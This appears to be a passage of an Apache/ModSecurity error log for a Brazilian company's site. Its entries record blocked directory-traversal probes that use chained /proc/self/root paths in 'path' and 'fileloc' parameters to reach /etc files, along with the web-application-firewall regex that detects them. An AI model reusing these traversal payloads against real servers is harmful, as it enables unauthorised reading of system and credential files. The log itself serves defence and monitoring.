"ab0yJLninkcc-iUj5ApkqAAAA5M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 08:41:51.861833 2026] [mime_magic:error] [pid 21219:tid 140411565680384] (70014)End of file found: [client 74.7.241.31:51340] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/systemd/user
[Fri Mar 20 08:41:54.517944 2026] [mime_magic:error] [pid 26799:tid 140411582465792] (70014)End of file found: [client 216.73.216.191:38666] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:42:15.183281 2026] [:error] [pid 10189:tid 140411624429312] [client 216.73.216.191:40200] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt 12"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ylzJ3M9BSuKP7CAYlwQAAAI4"]
[Fri Mar 20 08:42:16.771476 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.244.43:41820] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0ymLninkcc-iUj5AplHQAAA4Y"]
[Fri Mar 20 08:42:19.712552 2026] [mime_magic:error] [pid 15826:tid 140411632822016] (70014)End of file found: [client 216.73.216.191:40520] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:43:06.758015 2026] [:error] [pid 26799:tid 140411548894976] [client 216.73.216.191:43262] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0yyta6ubjKNq_cu4bdOwAAA1c"]
[Fri Mar 20 08:43:08.364116 2026] [:error] [pid 11642:tid 140411725141760] [client 216.73.216.191:43440] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/universal"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0yzLninkcc-iUj5AplTAAAA4I"]
[Fri Mar 20 08:43:16.063359 2026] [:error] [pid 7893:tid 140411616036608] [client 216.73.216.191:43910] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/utc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0y1BCii7xarUs8iHZvFgAAAg8"]
[Fri Mar 20 08:43:33.215229 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.228.61:38984] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0y5TJ3M9BSuKP7CAYmKwAAAJQ"]
[Fri Mar 20 08:43:33.631332 2026] [mime_magic:error] [pid 11167:tid 140411548894976] (70014)End of file found: [client 57.141.18.107:44718] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:43:35.217110 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:40028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0y5-oXxyEfFpUF8f-I1QAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:43:36.595370 2026] [mime_magic:error] [pid 11642:tid 140411683178240] (70014)End of file found: [client 216.73.216.191:45124] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:43:38.090848 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.243.128:54788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0y6PXLqtnMIWvjpaKiagAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:43:39.663763 2026] [:error] [pid 9818:tid 140411616036608] [client 74.7.243.128:54790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0y611pVZ5mVmJwsFM4kQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:43:41.519205 2026] [:error] [pid 31215:tid 140411540502272] [client 74.7.243.128:37740] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0y7QF0L0L-SsrnPo5w4gAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:43:44.499435 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:37744] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0y8OoXxyEfFpUF8f-I4AAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:43:45.896150 2026] [:error] [pid 11642:tid 140411649607424] [client 74.7.243.128:37754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0y8bninkcc-iUj5ApldwAAA4s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:43:53.200786 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.243.128:37764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0y-PqxLDW4GITHUkTw3wAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:43:54.951211 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:41238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0y-uoXxyEfFpUF8f-I7AAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:43:57.366038 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.243.128:41244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0y_QF0L0L-SsrnPo5w9gAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:43:58.721771 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.243.128:41254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0y_vXLqtnMIWvjpaKihwAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:43:59.237595 2026] [mime_magic:error] [pid 26799:tid 140411674785536] (70014)End of file found: [client 57.141.18.111:46288] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:44:00.007252 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:44940] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zAPqxLDW4GITHUkTw5AAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:01.351444 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.243.128:44944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zAfqxLDW4GITHUkTw5gAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:03.263154 2026] [:error] [pid 11167:tid 140411624429312] [client 74.7.243.128:44958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zA_HIg5MgXLBnicP_SQAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:05.354669 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.243.128:44972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zBBCii7xarUs8iHZvRwAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:06.840469 2026] [:error] [pid 31215:tid 140411725141760] [client 74.7.243.128:44976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zBgF0L0L-SsrnPo5w-wAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:44:10.311498 2026] [:error] [pid 7893:tid 140411683178240] [client 74.7.243.128:44980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zChCii7xarUs8iHZvUgAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
